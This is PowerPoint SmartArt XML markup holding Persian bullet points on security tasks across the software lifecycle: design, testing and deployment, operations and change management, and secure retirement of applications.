    <dsp:sp modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3467058" y="349876"/>
          <a:ext cx="103986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just" defTabSz="444500" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>برنامه ریزی و طراحی با برنامه نویسان و سهامداران داخلی مذاکره کنید، برای مثال متخصصین امنیتی.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" strike="sngStrike" kern="1200" noProof="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="4E8542"/>
            </a:solidFill>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="444500" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>معماری امنیتی، کنترل ها و اقدامات متقابل مناسب برای نیازهای حفاظتی و سطح تهدید مورد نظر را تعیین کنید. این باید توسط متخصصان امنیتی پشتیبانی شود.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="444500" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>اطمینان حاصل کنید که مالک نرم افزار خطرات باقیمانده را دریافت می کند یا منابع اضافی را فراهم می کند.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="444500" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>در هر سرعت، اطمینان از اینکه داستانهای امنیتی ایجاد می شوند، شامل محدودیت هایی است که برای الزامات غیر کاربردی اضافه شده است.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1322600" y="2595858"/>
        <a:ext cx="5328783" cy="938343"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="2436885"/>
          <a:ext cx="1115983" cy="125628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fa-IR"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طراحی و نقشه</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332" y="2491363"/>
        <a:ext cx="1007027" cy="1147332"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{992D08B6-B207-435B-A893-D17B49418ACB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3245070" y="1814904"/>
          <a:ext cx="1476358"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r" defTabSz="488950" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>راه اندازی امن برنامه، رابط ها و تمام اجزای مورد نیاز، از جمله مجوزهای لازم را به صورت خودکار انجام دهید.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" kern="1200" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="r" defTabSz="488950" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>تست عملکرد فنی و ادغام با معماری فناوری اطلاعات و هماهنگ سازی آزمون های کسب و کار.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" kern="1200" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="r" defTabSz="488950" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>ایجاد موارد استفاده از "استفاده" و "سوء استفاده" از دیدگاه های فنی و تجاری.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" kern="1200" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="r" defTabSz="488950" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>مدیریت تست های امنیتی بر اساس فرآیندهای داخلی، نیازهای حفاظت، و سطح تهدید فرض شده توسط برنامه.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" kern="1200" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="r" defTabSz="488950" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>در صورت لزوم، برنامه را در عمل قرار دهید و از برنامه های قبلی استفاده کنید.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" kern="1200" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="r" defTabSz="488950" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>تمام مستندات، شامل پایگاه اطلاعات مدیریت تغییر </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t> (CMDB) </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>و معماری امنیتی را نهایی کنید.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" kern="1200" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1342817" y="3861297"/>
        <a:ext cx="5280864" cy="1332218"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5CD1B5CA-4D0D-4D4E-B88E-2005B67086FE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="3756874"/>
          <a:ext cx="1114893" cy="1541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fa-IR"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تست گسترش و گستردن</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811299"/>
        <a:ext cx="1006043" cy="1432215"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0BBDD660-3A49-4256-9C52-69675972DDC1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3437204" y="3294149"/>
          <a:ext cx="1092090"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just" defTabSz="444500" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>عملیات باید شامل دستورالعمل هایی برای مدیریت امنیت برنامه (مانند مدیریت پچ) باشد.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" strike="sngStrike" kern="1200" noProof="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="4E8542"/>
            </a:solidFill>
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="444500" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>بالا بردن آگاهی امنیتی کاربران و مدیریت اختلافات در مورد قابلیت استفاده و امنیت.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="444500" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>برنامه ریزی و مدیریت تغییرات، به عنوان مثال مهاجرت به نسخه های جدید برنامه یا اجزای دیگر مانند سیستم عامل، </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>    </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>middleware</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t> و کتابخانه ها.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="444500" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>به روز رسانی تمام اسناد و مدارک، از جمله در </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>CMDB </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t> و معماری امنیتی، کنترل ها و اقدامات متقابل، از جمله هر کتاب و یا مستندات پروژه.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1324058" y="5513917"/>
        <a:ext cx="5318382" cy="985468"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D01C5B61-0A7B-4E05-A4E4-BE9BD871660D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="5361639"/>
          <a:ext cx="1114893" cy="12900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fa-IR"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مدیریت عملیات ها و تغییرات</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5416064"/>
        <a:ext cx="1006043" cy="1181173"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3670566" y="4395741"/>
          <a:ext cx="632850"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just" defTabSz="488950" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>هر گونه اطلاعات مورد نیاز باید بایگانی شود. تمام داده های دیگر باید ایمن پاک شود.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" kern="1200" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="488950" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>نرم افزار به درستی بازنشسته می شود، از جمله حذف حساب های استفاده نشده و نقش ها و مجوزها.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" kern="1200" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="488950" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>دولت برنامه خود را در </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>CMDB</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>بازنشسته کنید.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" kern="1200" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1302731" y="6825362"/>
        <a:ext cx="5368521" cy="571064"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{50CC931A-2802-4A28-B17D-4CFEC4144601}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="6715363"/>
          <a:ext cx="1115983" cy="79106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fa-IR"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سیستم های امتیازدهی</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94471" y="6753980"/>
        <a:ext cx="1038749" cy="7138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15.09.2020</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9/15/2020</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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2293177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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3420611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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="375841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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2717356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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2217569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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1405894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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1277246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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="116223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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16968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159330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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3442215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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="641558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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3743359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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3463339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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2407358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extLst>
